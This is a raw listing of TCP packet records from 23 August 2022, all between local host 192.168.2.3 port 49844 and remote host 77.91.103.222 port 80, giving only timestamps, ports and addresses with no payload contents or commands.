Aug 23, 2022 18:24:04.231556892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231597900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231622934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231622934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231626987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231678009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231682062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231683969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231709957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231736898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231751919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231764078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231774092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231813908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231817961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.231852055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231920958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.231980085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232059002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232131958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232140064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232160091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232203007 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232214928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232228994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232274055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232285976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232296944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232312918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232362032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232367992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232372046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232395887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232438087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232474089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232479095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232503891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232543945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232548952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232557058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232561111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232594013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232610941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232639074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232709885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232734919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.232839108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232844114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.232856989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233010054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233036041 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233057976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233088970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233107090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233299017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233367920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233390093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233444929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233469009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233473063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233488083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233513117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233539104 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233571053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233597040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233639002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233645916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233658075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233664989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233721972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233745098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233752966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233850002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233875036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233915091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.233922005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233947039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.233958006 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234009981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234014988 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234035969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234082937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234213114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234220982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234329939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234407902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234451056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234460115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234522104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234564066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234589100 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234632969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234647989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234689951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234694004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234694958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234719038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234743118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234766960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234788895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234807014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234812975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234850883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234877110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.234918118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234925032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.234927893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235045910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235073090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235095978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235173941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235177994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235194921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235420942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235488892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235651016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235701084 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235727072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235764027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235783100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235790968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235790968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235794067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235815048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235838890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235840082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235850096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235865116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235883951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235888004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235908031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.235913038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235938072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.235963106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236000061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236069918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236080885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236175060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236200094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236247063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236267090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236270905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236285925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236335993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236371040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236397028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236445904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236466885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236478090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236527920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236701965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236805916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236859083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.236912966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.236922026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237636089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237668991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237692118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237715006 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237739086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237749100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237761974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237787962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237796068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237812996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237837076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237874031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237878084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237880945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237903118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237920046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.237925053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.237967014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238020897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238131046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238158941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238195896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238209009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238245010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238255024 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238296032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238322973 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238349915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238389015 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238435030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238488913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238512039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238533974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238558054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238581896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238603115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238611937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238658905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238682032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238734961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238742113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238800049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238852978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238892078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.238934994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.238944054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239001989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239025116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239046097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239099026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239119053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239125967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239156961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239170074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239193916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239243984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239248991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239398956 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239424944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239449024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239480972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239494085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239516020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239579916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239603043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239603996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239605904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239653111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239695072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239742994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239748955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239753962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239756107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.239845991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239933014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.239949942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240015984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240021944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240041018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240096092 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240103006 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240119934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240144968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240170002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240184069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240186930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240214109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240256071 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240263939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240407944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240432978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240456104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240530014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240535021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240556955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240581036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240605116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240628958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240652084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240653992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240680933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.240696907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240736961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240765095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.240859985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241014004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241039038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241065025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241069078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241089106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241115093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241138935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241164923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241173029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241175890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241178989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241189957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241214991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241239071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241247892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241251945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241255999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241265059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241292000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241317034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241323948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241327047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241328955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241342068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241369009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241384029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241388083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241390944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241568089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241611004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241745949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241749048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.241770983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.241869926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.242355108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242383003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242407084 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242430925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242492914 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.242492914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242496014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.242644072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242698908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.242734909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242891073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242916107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242939949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.242960930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.242994070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243017912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243105888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243257999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243282080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243335009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243366003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243371010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243375063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243377924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243496895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243519068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243541002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243551970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243621111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243629932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243699074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243714094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243726015 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243751049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243776083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243875027 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.243891954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243948936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.243973970 CEST	80	49844	77.91.103.222	192.168.2.3
